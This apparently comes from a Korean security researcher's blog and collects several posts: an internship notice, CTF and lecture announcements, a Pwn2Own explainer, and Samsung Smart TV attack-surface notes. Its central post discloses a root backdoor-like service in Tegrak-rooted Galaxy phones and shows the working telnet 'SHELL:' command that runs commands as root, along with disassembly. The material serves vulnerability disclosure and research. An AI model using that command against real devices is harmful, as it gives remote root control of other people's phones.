GrayHash internship announcement

GrayHash, an offensive research center, is recruiting interns. GrayHash is one of the top offensive research labs in Korea and mainly provides security consulting to government agencies and large enterprises.

Most of GrayHash's consulting work is about finding security problems that can occur in software, and the target platforms vary: desktops, mobile devices, embedded devices and more.

GrayHash's work falls into three broad areas:

– Identifying security vulnerabilities through source code auditing and reverse engineering
– Developing security-related systems
– Developing security training frameworks

In addition, members run their own individual projects and research the areas they are interested in, in depth. Typically this means hunting zero-days in well-known software, researching exploitation techniques, and finding security problems on new platforms.

If you become a GrayHash intern, your main job is “finding security vulnerabilities in applications”. During the internship you “barely take part in GrayHash's official work and can spend most of your time strengthening your own skills”. You also have to prove your ability by completing assignments periodically.

The qualifications required for this role are:

– Understanding of how vulnerabilities arise
– Exploitation techniques for memory corruption bugs
– Programming
– Self-management
– Communication with the boss

To be a little more specific: you need a basic understanding of source code auditing. Understanding the architectures of various platforms is a plus, but being able to read Intel CPU assembly is enough.

The intern must be able to work diligently, and communication with the boss during the internship has to be smooth. The documents required to apply are:

– Resume (any format)
– Portfolio (preferably focused on work related to what GrayHash does)
– Submit to: cybermong@grayhash.com
– Please be sure to put “[인턴지원]” (internship application) at the beginning of the email subject.

Other information:

– Positions: 2
– Application deadline: August 31, 2013
– After passing the first-round document screening, hiring is decided by interview (travel expenses for the interview are covered)
– First-round results: one week after applying
– Interview results: three days after the interview

Internship working conditions:

– Work from home
– Periodic offline meetings (about once a week)
– Internship period is 2 months (after evaluation, extension or conversion to a regular researcher)
– Intern pay: 2,000,000 KRW per month
– Everything obtained in the course of company work is covered by an NDA

There are no restrictions on education, gender or age. We look forward to many applications from passionate security people!

My CTF challenge for SECUINSIDE 2013

For those who missed my challenge at SECUINSIDE CTF 2013, “angry_danbi” is here! You can download the binary.

http://115.68.24.145/secu_2013/

Here is a short description. This challenge is written in assembly and has some cute tricks for:

– anti Linux-based analysis tools (like gdb, objdump and so on)
– anti IDA (you can’t open the binary in IDA)
– anti Hex-Rays
– obfuscated instructions
– obfuscation to make Hex-Rays results dumb

Those are only the start. If you get over the hurdles, you then need to figure out a tiny VM inside. Understanding the VM opcodes and leaking some bytes is the first goal. The next is just a stupid file API. The final goal is just a simple overflow. But you would miss something if you rely heavily on Hex-Rays. (Obfuscation.) So, this challenge has 3 stages.

Sounds a bit complicated, but actually it was not, because we had many challenges and we wanted teams to be able to solve all of them during the competition. In the end, 4 teams solved this one nicely.

I’m planning to make a much harder challenge than this one for the finals, since we may have fewer challenges. I hope teams will like it too. :) Catch up at the stage!

ARM basic reverse engineering lecture slides

I gave a lecture for a company last year about basic reverse engineering for ARM. That lecture was for people who had no experience with RE and wanted to give ARM a shot. I’m uploading the slides here, but there are some things (including errata) to be fixed. For example, I need to make a new IDAPython script to see which instructions are used most in ARM binaries. But it seems hard to find time to do that, and I don’t want to share the slides much later, so I’ll just post it.

Although it’s not a perfect case, feel free to use the slides. They have 2 parts. One is solving a simple challenge by me, and the other explains a really basic concept of a packer for ARM CPUs. Please keep in mind that this is only v0.1 and I’ll update it when I have a chance. I believe the URLs mentioned in the slides are still alive.

PDF_LINK (Let me know if you need the Keynote file to modify and re-use it.)

Cheers.

Smart TV Security Slides

So, I gave talks at CanSecWest and Troopers. The slides for CanSecWest are already out there, but this one is slightly more updated. I’m planning to research Smart TVs more, especially what attackers can do after pwning a Smart TV, like private radio.

Enjoy!

beist_smarttv_security

Owning Tegrak-ROM-rooted mobile phones (Galaxy and Optimus)

Tegrak (http://pspmaster.tistory.com) is the most popular rooting community for Android OS in Korea. They mostly focus on Samsung Galaxy devices but also provide customized firmware for LG Optimus devices. As Tegrak is very well known here, many Korean Galaxy users root their phones with Tegrak customized firmware.

Tegrak installs customized firmware on users’ phones. The problem is that Tegrak puts some special sauce on the devices as well. They install and run some custom binaries, and one of them opens a TCP socket. Let’s see which binary has the socket.

# netstat -anp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:7777 0.0.0.0:* LISTEN 196/sec-ril
tcp 0 0 127.0.0.1:7203 0.0.0.0:* LISTEN 196/sec-ril
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN 195/rild
tcp 0 0 0.0.0.0:20397 0.0.0.0:* LISTEN 3938/tegrak_service

You can see the ‘tegrak_service’ process, and it has a socket listening on TCP port 20397 on all interfaces (0.0.0.0), unlike the other daemons, which are bound to 127.0.0.1. Let me check the binary path.

# head -n 1 /proc/3938/maps
00008000-0001a000 r-xp 00000000 00:01 1234 /tegrak/bin/tegrak_service

Now it’s time to fire up IDA and open the binary. As this is a simple security issue, I’ll go straight to the relevant spots.

.text:0000C4CC sub_C4CC                                ; CODE XREF: .text:loc_167FCj
.text:0000C4CC                                         ; DATA XREF: .text:loc_167FCo ...
.text:0000C4CC
.text:0000C4CC var_4BC         = -0x4BC
.text:0000C4CC sock_fd         = -0x4B8
.text:0000C4CC var_4B4         = -0x4B4
.text:0000C4CC var_4B0         = -0x4B0
.text:0000C4CC var_4AC         = -0x4AC
.text:0000C4CC
.text:0000C4CC                 PUSH    {R4-R7,LR}
.text:0000C4CE                 LDR     R3, =(dword_1A4FC - 0xC4D8)
.text:0000C4D0                 LDR     R4, =0xFFFFFFA4
.text:0000C4D2                 LDR     R5, =0xFFFFFB54
.text:0000C4D4                 ADD     R3, PC ; dword_1A4FC
.text:0000C4D6                 LDR     R1, [R3,R4]
.text:0000C4D8                 LDR     R2, =0x4A4
.text:0000C4DA                 ADD     SP, R5
.text:0000C4DC                 LDR     R0, [R1]
.text:0000C4DE                 ADD     R2, SP
.text:0000C4E0                 STR     R0, [R2]
.text:0000C4E2                 BL      sub_BCD8
.text:0000C4E6                 MOVS    R0, #2
.text:0000C4E8                 MOVS    R1, #1
.text:0000C4EA                 MOVS    R2, #0
.text:0000C4EC                 BLX     mySocketCall
.text:0000C4F0                 MOVS    R3, R0
.text:0000C4F2                 STR     R0, [SP,#0x4C0+sock_fd]
.text:0000C4F4                 ADDS    R3, #1
.text:0000C4F6                 BNE     loc_C4FE
.text:0000C4F8                 LDR     R0, =(aSocket - 0xC4FE)
.text:0000C4FA                 ADD     R0, PC          ; "socket"
.text:0000C4FC                 B       loc_C546
.text:0000C4FE                 LDR     R4, =0x414
.text:0000C500                 MOVS    R1, #0
.text:0000C502                 MOVS    R2, #0x6E
.text:0000C504                 ADD     R4, SP
.text:0000C506                 MOVS    R0, R4
.text:0000C508                 BLX     sub_8678
.text:0000C50C                 LDR     R6, =0x484
.text:0000C50E                 LDR     R1, =(aDevSocketTegra - 0xC51C)
.text:0000C510                 LDR     R0, =0x416
.text:0000C512                 MOVS    R2, #1
.text:0000C514                 ADD     R6, SP
.text:0000C516                 STRH    R2, [R4]
.text:0000C518                 ADD     R1, PC          ; "/dev/socket/tegrak_service"
.text:0000C51A                 MOVS    R2, #0x6B
.text:0000C51C                 ADD     R0, SP
.text:0000C51E                 LDR     R7, =0xFFFFAD4F
.text:0000C520                 BL      sub_12D08
.text:0000C524                 MOVS    R1, #0
.text:0000C526                 MOVS    R2, #0x10
.text:0000C528                 MOVS    R0, R6
.text:0000C52A                 BLX     sub_8678
.text:0000C52E                 MOVS    R3, #2
.text:0000C530                 STRH    R3, [R6]
.text:0000C532                 STRH    R7, [R6,#2]
.text:0000C534                 LDR     R0, [SP,#0x4C0+sock_fd]
.text:0000C536                 MOVS    R1, R6
.text:0000C538                 MOVS    R2, #0x6E
.text:0000C53A                 BLX     myBindCall

The binary has no symbols, so mySocketCall() and myBindCall() are names I assigned. The port number is 20397, and we should make sure that this bind function takes that port number. Look at 0x0000C51E and 0x0000C532: the code stores the halfword 0xAD4F at [R6+2], which is where bind() reads the port number from. The port is kept in network byte order, so the little-endian halfword 0xAD4F reads as 0x4FAD, and 0x4FAD is 20397 in decimal. We got it.

Let’s look at myBindCall().

.text:000082C0 myBindCall                              ; CODE XREF: sub_C4CC+6Ep
.text:000082C0                 STMFD   SP!, {R4,R7}
.text:000082C4                 LDR     R7, =0x11A
.text:000082C8                 SVC     0
.text:000082CC                 LDMFD   SP!, {R4,R7}
.text:000082D0                 MOVS    R0, R0
.text:000082D4                 BXPL    LR
.text:000082D8                 B       sub_16804
.text:000082D8 ; End of function myBindCall

At 0x000082C4, the code sets R7 to 0x11A. We know that R7 holds the system call number on ARM, and 0x11A (282) is the bind system call number. So it’s clear that this function calls the bind system call.
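To make the byte-order reasoning above concrete, here is an added C example (my own code, not from the post or from the tegrak_service binary) that fills a 16-byte buffer the way the stores at 0xC524..0xC532 do and then reads it back as the fields of the Linux struct sockaddr_in that the bind system call interprets. The buffer bytes are constructed from the disassembly; the field offsets are those of struct sockaddr_in on Linux.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Layout of struct sockaddr_in on Linux (16 bytes):
 *   0..1  sin_family  (host byte order; little-endian on this ARM device)
 *   2..3  sin_port    (network byte order, i.e. big-endian)
 *   4..7  sin_addr    (network byte order; all zero = INADDR_ANY)
 *   8..15 padding */
#define SOCKADDR_IN_LEN 16

/* Reproduce the stores from the disassembly (constructed here, not the
 * binary's own bytes):
 *   memset(buf, 0, 0x10)            -> BLX sub_8678 with R2 = 0x10
 *   STRH R3, [R6]     (R3 = 2)      -> family = AF_INET
 *   STRH R7, [R6,#2]  (R7 = 0xAD4F) -> port halfword
 * The device is little-endian, so the halfword 0xAD4F lands in memory as
 * the two bytes 0x4F 0xAD. */
void fill_sockaddr_like_binary(unsigned char buf[SOCKADDR_IN_LEN]) {
    memset(buf, 0, SOCKADDR_IN_LEN);
    buf[0] = 0x02; buf[1] = 0x00;   /* little-endian halfword 2 */
    buf[2] = 0x4F; buf[3] = 0xAD;   /* little-endian halfword 0xAD4F */
}

/* sin_family is stored in host order, so the low byte comes first. */
uint16_t sockaddr_family(const unsigned char buf[SOCKADDR_IN_LEN]) {
    return (uint16_t)(buf[0] | (buf[1] << 8));
}

/* The kernel reads sin_port in network order: the first byte is the high
 * byte. 0x4F 0xAD -> 0x4FAD -> 20397. This is the ntohs() the post does by
 * hand when it says 0xAD4F "should be" 0x4FAD. */
uint16_t sockaddr_port(const unsigned char buf[SOCKADDR_IN_LEN]) {
    return (uint16_t)((buf[2] << 8) | buf[3]);
}

/* sin_addr left at zero is INADDR_ANY: the socket accepts connections on
 * every interface, which is why netstat shows 0.0.0.0:20397 rather than a
 * loopback-only 127.0.0.1:20397 like the other daemons. */
int sockaddr_is_inaddr_any(const unsigned char buf[SOCKADDR_IN_LEN]) {
    return buf[4] == 0 && buf[5] == 0 && buf[6] == 0 && buf[7] == 0;
}

/* Wrappers that build the constructed buffer and decode it in one step. */
uint16_t tegrak_like_port(void) {
    unsigned char buf[SOCKADDR_IN_LEN];
    fill_sockaddr_like_binary(buf);
    return sockaddr_port(buf);
}

int tegrak_like_binds_all_interfaces(void) {
    unsigned char buf[SOCKADDR_IN_LEN];
    fill_sockaddr_like_binary(buf);
    /* On ARM EABI the bind system call number is 282 (0x11A), the value
     * loaded into R7 in myBindCall; the struct above is its second argument. */
    return sockaddr_family(buf) == 2 && sockaddr_is_inaddr_any(buf);
}

int main(void) {
    printf("family=%u port=%u inaddr_any=%d\n",
           2u, tegrak_like_port(), tegrak_like_binds_all_interfaces());
    return 0;
}
```

The same decoding applies to any bind() call you trace in a stripped binary: find the memset of the 16-byte structure, the halfword store at offset 2, and whether offset 4 is ever written; an untouched offset 4 means the listener is reachable from the network, not just from the device itself.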

This program behaves like any normal network program: socket()-bind()-accept(). Then it goes to recv() and handles the user-provided buffer. The handler function is myParseUserCommand(), which is also a name I assigned.

.text:0000C5DA                 STRB    R0, [R5,R4]
.text:0000C5DC                 MOVS    R1, R5
.text:0000C5DE                 MOVS    R0, R6
.text:0000C5E0                 BL      sub_D8F4
.text:0000C5E4                 MOVS    R1, R5
.text:0000C5E6                 LDR     R0, [SP,#0x4C0+var_4BC]
.text:0000C5E8                 BL      myParseUserCommand

I’ll skip explaining the whole function; however, myParseUserCommand() is very predictable. It compares the user buffer (command) against the values of an array and jumps to a routine if there is a match. The array looks like this:

.data:0001A538 ; _DWORD dword_1A538[26]
.data:0001A538 dword_1A538     DCD 0, 0x17997, 1, 0x17685, 2, 0x1799E, 5, 0x179AB, 6
.data:0001A538                                         ; DATA XREF: .got:0001A4A4o
.data:0001A538                 DCD 0x179BC, 7, 0x179CE, 8, 0x179D4, 0xC, 0x179E7, 0xD
.data:0001A538                 DCD 0x179FB, 0x11, 0x1781D, 0x12, 0x17845, 0x13, 0x17A0E

Here are the “address: value” pairs (the strings the addresses point to).

0x17997: UNKOWN
0x17685: TEGRAK_KERNEL
0x1799E: CHECK_LAGFIX
0x179AB: ENABLE_SUPERUSER
0x179BC: DISABLE_SUPERUSER
0x179CE: SHELL
0x179D4: CHECK_CACHE_LAGFIX
0x179E7: CHECK_SYSTEM_LAGFIX
0x179FB: CHECK_ONENAND_MODE
0x1781D: TEGRAK_KERNEL_SUB_VERSION
0x17845: TEGRAK_KERNEL_MODEL_NAME
0x17A0E: SYSTEM_APP_REMOVE

Obviously your eyes pop when you see “SHELL” anywhere. You can picture that there is a routine for the “SHELL” command that executes your command. There is parsing code for your buffer, but I’ll skip it as it’s really simple. Let me show you the PoC directly.

I’m testing on a Samsung Galaxy S2 rooted by Tegrak. The mobile device has 10.0.1.17 as its IP address.

$ telnet 10.0.1.17 20397
Trying 10.0.1.17...
Connected to 10.0.1.17.
Escape character is '^]'.
TESTGOGOGO
ERROR:UNKOWN:unkown command.
SHELL:mkdir /data/local/tmp/beist_poc
OK:SHELL:mkdir /data/local/tmp/beist_poc
^]
telnet> close
Connection closed.

The lines TESTGOGOGO and SHELL:mkdir /data/local/tmp/beist_poc are my input (shown in bold-italic brown in the original post). You put the command you want to execute on the device after “SHELL:”. Let’s see what happened in the /data/local/tmp directory.

# ls -al /data/local/tmp
total 10700
drwxrwx--x 5 2000 2000 4096 Feb 22 11:08 .
drwxrwx--x 4 2000 2000 4096 Jan 2 1970 ..
-rwxrwxrwx 1 0 0 439013 Jan 28 21:07 arm_rsh
drwxrwxrwx 2 0 0 4096 Feb 22 11:08 beist_poc
-rwxr-xr-x 1 0 0 1096224 Dec 11 16:56 busybox_arm
-rwxrwxrwx 1 0 0 4252764 Mar 1 2009 gdb

I think popping calc.exe would be more l33t, but we see the “beist_poc” directory has been created, anyway.

The thing is, the tegrak_service process is running as ‘root’, which means you can do whatever you want on the target device. Moreover, even though I’ve tested this issue only on a Samsung Galaxy S2, it’s very possible that it works on the latest Samsung Galaxy phones rooted with Tegrak firmware, because I haven’t seen any report about this issue.

Actually I have a Galaxy S3 and a Galaxy Note 2, but those are used for my research and I won’t try anything that could mess them up. :) So, if you have a Tegrak-rooted Galaxy S3, please check this issue out and let us know.

By the way, I don’t think this is a backdoor by the Tegrak developer, because if he really wanted to make a backdoor, he’d probably take a better way, as he fully controls the firmware. I guess he just didn’t expect someone like me who tries to dig into every piece of software. :)

Again, as Tegrak is very popular in Korea, there are really many people who root their phones with Tegrak firmware. This is a critical security issue and I highly recommend you delete the /tegrak/bin/tegrak_service file. This is not a full solution, but it’s better than nothing until the Tegrak developer fixes this issue.

Cheers.

Introduction to PWN2OWN at CANSECWEST 2013

This year the PWN2OWN event is again being held at CANSECWEST 2013. PWN2OWN is an event started by HP, a kind of hacking contest. What makes it different from ordinary hacking competitions is that hackers use zero-day vulnerabilities they found themselves at the venue and, if they succeed, receive prize money.

The 2013 CANSECWEST PWN2OWN event is run jointly by HP and Google. The prizes are also very high, so it draws attention from many hackers and the media. The target platforms are limited to those the organizers specify. Below is the list of target platforms posted on the official HP DVLABS blog.

– Web Browser
   – Google Chrome on Windows 7 ($100,000)
   – Microsoft Internet Explorer, either
     – IE 10 on Windows 8 ($100,000), or
     – IE 9 on Windows 7 ($75,000)
   – Mozilla Firefox on Windows 7 ($60,000)
   – Apple Safari on OS X Mountain Lion ($65,000)
– Web Browser Plug-ins using Internet Explorer 9 on Windows 7
   – Adobe Reader XI ($70,000)
   – Adobe Flash ($70,000)
   – Oracle Java ($20,000)

The main targets are widely used web browsers: Internet Explorer, Chrome, Firefox and Safari. Besides the contest on the browsers themselves, browser plug-ins are also targets; as you can see above, PDF, Flash and Java are included. All environments are fully up to date with the latest patches.

The rules are simple.

1. When registering, contestants choose the categories they want to compete in
   (multiple categories allowed)
2. Contestants have 30 minutes to attempt their attack
3. User interaction must be minimal
   (something at the level of visiting a specific web page is allowed)
4. Code execution must be achieved (e.g., launching the calculator)

Depending on the platform, there may be additional rules such as:

# If the target platform has a sandbox, the sandbox must also be bypassed for the attempt to count (for example, Chrome)

Attacking a well-secured browser like Chrome is not easy, but the prize matches the difficulty: for Chrome the prize is over 100 million KRW. To receive the prize, you must provide a detailed report on the vulnerabilities used in the attack. Naturally, the vulnerabilities used in this contest must be bugs that have never been disclosed.

There are additional rewards too. ZDI, the vulnerability reward program run by HP, gives contest winners 20,000 ZDI points along with the laptop they compromised in the contest. Earning 20,000 ZDI points automatically raises you to ZDI Silver status, which comes with $5,000 in cash, a 15% monetary bonus, a 25% reward point bonus and, finally, a flight ticket and registration for DEFCON 2013.

Of course, it is true that you can earn more by selling zero-days on the grey or black market instead of through an official event like this. However, participating in an official event lets you raise your name value and secure credit, which makes it very attractive. If you pwn Chrome or Internet Explorer, you can receive 107,450,000 KRW!

Beyond web browsers, high prizes are also set for plug-ins. PDF and Flash start at $70,000. Java’s prize is lower, but one overseas security company is said to hold more than 10 to 20 Java vulnerabilities alone, so the barrier to entry is correspondingly low and it is worth a try.

There is no ranking of winners, so you can consider yourself a winner if your attack succeeds during your turn. There is a cap on the total prize money, but it is $500,000, so it seems unlikely that anyone will be left off the winners list for lack of funds. Over the many PWN2OWN events held so far, no participant has ever missed out on a prize because the money ran out.

There has not yet been a Korean PWN2OWN winner, but I understand the number of bug hunters in Korea is growing. I hope to hear news of Korean winners at CANSECWEST PWN2OWN 2013!

Dirty note on Samsung Smart TV Security

So, I’ve been pretty busy this year. I’ve been working independently for big companies and for a government training program (called BoB). And no need to mention having drinks on both weekdays and weekends with my buddies. Which means not much time for research.

Fortunately, I kept this December not too busy, so I started researching Samsung Smart TV security about a month ago. Why Smart TV? Because it’s already popular worldwide and obviously it’s going to become even more popular.

As the press says, over 54M Smart TVs were sold last year, and 80M Smart TVs have been sold this year already. But we can hardly see any security research in the field (Revuln.com did a good job), so, why not? Why did I choose Samsung Smart TV? Because it’s the industry’s No.1 brand.

I bought 2 Samsung Smart TVs for research. Each is about $2,500. The model name is Samsung Smart TV ES8000, and there are a variety of models of it. Mine is the 46-inch one, which is the smallest. But it has as many features as the larger models, so it’s fair enough to dig into.

As a quick review of the product, I’ve categorized the attack surfaces of the TV:

1. Samsung Apps (This is like App store of Apple)
2. Network (Internet, internal network, MiTM)
3. Physical attack
4. Broadcast signal
5. Contents (DRM)
6. Default installed apps and insecure storage

I’m still working on it, but I want to mention some points. I’ll go first with the security architecture design of the Samsung Smart TV. As you can see from the guidelines on the Samsung Smart TV developer site (http://samsungdforum.com), you can only develop Smart TV applications in HTML/JavaScript/Flash.

They don’t allow you to write native programs in languages like C or C++. Aside from the performance issue, that seems acceptable, since you typically can’t make malicious programs in JavaScript/Flash: they run in something like a VM and you can’t use syscalls directly.

And it’s known that you usually can’t use file I/O calls or the like in JavaScript. But it makes almost no sense to write modern programs without file I/O. Therefore, Samsung gives you APIs to create/modify/remove files from JavaScript. They also give you multiple API classes through which you can control the camera/mic and other things.

But if you look at how your application runs on the TV, you’d feel bad. The Smart TV uses Linux and there is only one account, ‘root’. So basically all processes run as ‘root’. The problem is that all applications written by developers also run as ‘root’. (This is a very wrong design.)

['ps' result of the TV]

  PID USER       VSZ STAT COMMAND
    1 root      1688 S    init
    2 root         0 SW   [kthreadd]
    3 root         0 SW   [ksoftirqd/0]
    4 root         0 SW   [migration/0]
    5 root         0 SW   [migration/1]
    6 root         0 SW   [ksoftirqd/1]
    7 root         0 SW   [events/0]
    8 root         0 SW   [events/1]
    9 root         0 SW   [khelper]
   10 root         0 SW   [async/mgr]
   11 root         0 SW   [sync_supers]
   12 root         0 SW   [bdi-default]
   13 root         0 SW   [kblockd/0]
   14 root         0 SW   [kblockd/1]
   15 root         0 SW   [kmmcd]
   16 root         0 SW   [kdtvlogd]
   17 root         0 SW   [kswapd0]
   18 root         0 SW   [xfs_mru_cache]
   19 root         0 SW   [xfslogd/0]
   20 root         0 SW   [xfslogd/1]
   21 root         0 SW   [xfsdatad/0]
   22 root         0 SW   [xfsdatad/1]
   23 root         0 SW   [xfsconvertd/0]
   24 root         0 SW   [xfsconvertd/1]
   25 root         0 SW   [mmcqd]
   37 root      1692 S    -/bin/sh
   58 root      1692 S    /bin/sh /mtd_exe/rc.local
   67 root     1502m S    ./exeDSP
   88 root         0 SW   [aeMsgTask]
  149 root         0 SW   [khubd]
  247 root         0 SW   [flush-179:0]
  256 root     17692 S    /mtd_cmmlib/BT_LIB/bsa_server -all=0 -diag=0 -hci=0
  265 root         0 SW   [usbhid_resumer]
  458 root      234m S    /mtd_appdata/Runtime/bin/X -logfile /mtd_rwarea/Xlog
  579 root      486m S    /mtd_appdata/InfoLink/lib/WidgetEngine 67 51982
  657 root     16632 S    HAControl 37039 -1
  678 root         0 SW   [scsi_eh_0]
  679 root         0 SW   [usb-storage]
  709 root         0 DW   [scsi-poller]
  880 root         0 SW   [RtmpTimerTask]
  881 root         0 SW   [RtmpMlmeTask]
  882 root         0 SW   [RtmpCmdQTask]
  883 root         0 SW   [RtmpWscTask]
 1047 root      1688 S    udhcpc -i ra11n0 -t 5 -T 5 -b
 1067 root      3684 S N  /mtd_exe/Comp_LIB/UEP.b
 1075 root     10680 S    ./MainServer /mtd_rwarea/yahoo
 1079 root     10072 S    ./PDSServer
 1080 root     18656 S    ./AppUpdate com.yahoo.connectedtv.updater
 1112 root     18956 S    ./BIServer com.yahoo.connectedtv.samsungbi
 1133 root      361m T    /mtd_down/emps/empWebBrowser/bin/BrowserLauncher
 1368 root      9592 S    Download 42060 -1

And it seems Samsung developers try to prevent bad guys from making malicious programs. How? They put you in a sandbox. For example, you can create files, but only in a specific directory. Technically you can’t escape from the sandbox.

.text:0004BDFC ; jx_GetFullPath(char *, char *)
.text:0004BDFC                 EXPORT _Z14jx_GetFullPathPcS_
.text:0004BDFC
.text:0004BDFC var_820         = -0x820
.text:0004BDFC s               = -0x420
.text:0004BDFC ptr             = -0x20
.text:0004BDFC
.text:0004BDFC                 STMFD           SP!, {R4-R8,R11,LR}
.text:0004BE00                 ADD             R11, SP, #0x18
.text:0004BE04                 SUB             SP, SP, #0x800
.text:0004BE08                 MOV             R4, #0
.text:0004BE0C                 SUB             SP, SP, #0xC
.text:0004BE10                 MOV             R5, R0
.text:0004BE14                 MOV             R2, #0x400 ; n
.text:0004BE18                 MOV             R6, R1
.text:0004BE1C                 SUB             R0, R11, #-s ; s
.text:0004BE20                 MOV             R1, R4  ; c
.text:0004BE24                 STR             R4, [R11,#ptr]
.text:0004BE28                 BL              memset
.text:0004BE2C                 MOV             R1, R4  ; c
.text:0004BE30                 SUB             R0, R11, #-var_820 ; s
.text:0004BE34                 MOV             R2, #0x400 ; n
.text:0004BE38                 BL              memset
.text:0004BE3C                 LDRSB           R3, [R5]
.text:0004BE40                 CMP             R3, #0x2F ; /
.text:0004BE44                 BEQ             loc_4BEC0
.text:0004BE48                 CMP             R3, #0x2E ; .
.text:0004BE4C                 BEQ             loc_4BEC8
.text:0004BE50                 SUB             R8, R11, #-ptr
.text:0004BE54                 SUB             R7, R11, #-s
.text:0004BE58                 MOV             R1, R6
.text:0004BE5C                 SUB             R4, R11, #-var_820
.text:0004BE60                 MOV             R0, R8
.text:0004BE64                 BL              _Z20STR_AllocCopyDefaultPPcPKc 
.text:0004BE68                 MOV             R1, R5
.text:0004BE6C                 MOV             R0, R8
.text:0004BE70                 BL              _Z19STR_AllocCatDefaultPPcPKc 
.text:0004BE74                 MOV             R1, R7  ; resolved
.text:0004BE78                 LDR             R0, [R11,#ptr] ; name
.text:0004BE7C                 BL              realpath
.text:0004BE80                 MOV             R1, R4  ; resolved
.text:0004BE84                 MOV             R0, R6  ; name
.text:0004BE88                 BL              realpath
.text:0004BE8C                 MOV             R0, R4  ; s
.text:0004BE90                 BL              strlen
.text:0004BE94                 MOV             R1, R7
.text:0004BE98                 MOV             R2, R0
.text:0004BE9C                 MOV             R0, R4
.text:0004BEA0                 BL              _Z12STR_NcasecmpPKcS0_i 
.text:0004BEA4                 CMP             R0, #0
.text:0004BEA8                 LDR             R0, [R11,#ptr] ; ptr
.text:0004BEAC                 BNE             loc_4BEB8
.text:0004BEB0                 SUB             SP, R11, #0x18
.text:0004BEB4                 LDMFD           SP!, {R4-R8,R11,PC}
.text:0004BEB8                 CMP             R0, #0
.text:0004BEBC                 BNE             loc_4BEDC
.text:0004BEC0                 MOV             R0, #0
.text:0004BEC4                 B               loc_4BEB0
.text:0004BEC8                 LDRSB           R3, [R5,#1]
.text:0004BECC                 CMP             R3, #0x2E
.text:0004BED0                 BNE             loc_4BE50
.text:0004BED4                 MOV             R0, #0
.text:0004BED8                 B               loc_4BEB0
.text:0004BEDC                 BL              free
.text:0004BEE0                 MOV             R0, #0
.text:0004BEE4                 B               loc_4BEB0

– Pseudo code is like:

jx_GetFullPath(filepath, stricted_directory) {
   ...
   if not filepath starts with stricted_directory:
      exit
   ...
}

However, as I said before, running all processes as ‘root’ is wrong, which means that if there is any vulnerable API, an attacker could compromise the TV and get the most privileged account. There are many classes of API and, as you’d guess, I’ve found many vulnerable APIs. You can get ‘root’ very easily using the vulnerabilities.
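The pseudo code above reduces the sandbox decision to a prefix test on two realpath() results. As an added example (my own code, not Samsung's jx_GetFullPath), here is a small C implementation of that kind of check with the two details a robust version needs: it fails closed when realpath() cannot resolve a component (for instance a nonexistent directory), and it requires a '/' boundary after the prefix so that a sibling directory whose name merely starts with the sandbox root is not accepted. The sandbox root and file names used in main() are constructed for illustration.

```c
#ifndef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700   /* declares realpath() on glibc */
#endif
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifndef PATH_MAX
#define PATH_MAX 4096
#endif

/* Lexical containment test on two already-canonical absolute paths.
 * Returns 1 when `path` is `base` itself or lies strictly below it.
 * A bare prefix match is not enough: "/mtd_rwarea/app" is a prefix of
 * "/mtd_rwarea/appevil/x" but does not contain it, so the character right
 * after the prefix must be '/' (or the end of the string). */
int path_within(const char *base, const char *path) {
    size_t blen = strlen(base);

    /* "/sandbox/" and "/sandbox" name the same directory; drop the trailing
     * slash but keep the root directory "/" special. */
    while (blen > 1 && base[blen - 1] == '/')
        blen--;
    if (blen == 1 && base[0] == '/')
        return path[0] == '/';

    if (strncmp(base, path, blen) != 0)
        return 0;
    return path[blen] == '\0' || path[blen] == '/';
}

/* Canonicalise both the sandbox root and the requested name with realpath(),
 * which collapses "..", duplicate slashes and symlinks, then apply the
 * lexical test. Fails closed: if either side cannot be resolved (missing
 * component, permission denied, overlong path) the request is rejected
 * rather than compared as an unresolved string. */
int sandbox_allows(const char *sandbox_root, const char *requested) {
    char root_resolved[PATH_MAX];
    char req_resolved[PATH_MAX];

    if (realpath(sandbox_root, root_resolved) == NULL)
        return 0;
    if (realpath(requested, req_resolved) == NULL)
        return 0;
    return path_within(root_resolved, req_resolved);
}

int main(void) {
    /* Constructed inputs; "/mtd_rwarea/app" is an illustrative root, not a
     * path taken from the TV. */
    printf("%d\n", path_within("/mtd_rwarea/app", "/mtd_rwarea/app/data.txt"));
    printf("%d\n", path_within("/mtd_rwarea/app", "/mtd_rwarea/appevil/x"));
    printf("%d\n", sandbox_allows("/tmp", "/tmp/../etc"));
    printf("%d\n", sandbox_allows("/tmp", "/tmp/no-such-dir-xyz/../../etc/passwd"));
    return 0;
}
```

Note that realpath() only succeeds for names that exist, so a create-file API has to resolve the parent directory and then check the final component separately; and even a correct check limits only what the API writes, not what a process that is already running as root can do, which is the design point the post makes.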

At this point, one thing I have to say is that, again, this is a wrong design even if the Samsung developers made all APIs secure. It’s a “sooner or later” problem. They will make more APIs anyway, and if anything goes wrong, they are going to have a bad time. They need to implement something like iOS’s MAC or Android’s isolation policy *at least*.

So, we’ve found around 10 API vulnerabilities so far, but we’re pretty sure there will be more. We just stopped looking at it because there are more attack surfaces on the Samsung Smart TV.

As all processes run as ‘root’, if any pre-installed application is vulnerable to a MiTM attack, again, an attacker can compromise the TV. Some applications are protected against MiTM attacks, but some are not. And some applications only seem to be protected against MiTM. For example, an application does automatic updates and checks the new binary’s checksum.

But the problem is that we can regenerate the checksum because we have the binaries and the keys. I haven’t seen any application using a TPM or something like ARM TrustZone, which means you can easily get the keys on the machine. However, they may use ARM TrustZone when playing multimedia content. (But I haven’t checked this out yet.)

Next, there are many network daemons on the TV: over 10 TCP/UDP-based programs. We’ve found some memory-corruption-style bugs in some of them. Even though we haven’t managed to make working exploits yet, it’s just a matter of time.

Physical attack vectors are also nice for hackers. Pwning via USB sticks is becoming more notorious. You may have seen the excellent work by j00ru (http://j00ru.vexillium.org/?p=1272) before. I also did some research on that kind of bug in 2008, though. It was crashing the NTFS driver when I put a USB stick into my laptop.

If you want more range for physical attacks, then an IrDA-based remote controller would be a nice idea. We’ve figured out that there are some hidden commands in the remote controller protocol. So we’ve been able to turn on the debug mode on our TV. Also, there is still a possibility that you could find some memory-corruption-style vulnerabilities in the parsing of the protocol data.

Pwning via the broadcast signal would be ideal as well. The Samsung Smart TV offers 3 ways to upgrade the firmware: via the internet, USB and the broadcast signal. I’m not sure why they offered users this last way, but it’s probably for people who can’t use the internet. To be honest, we haven’t done any research on that part yet, but it’s obviously fun to take a look.

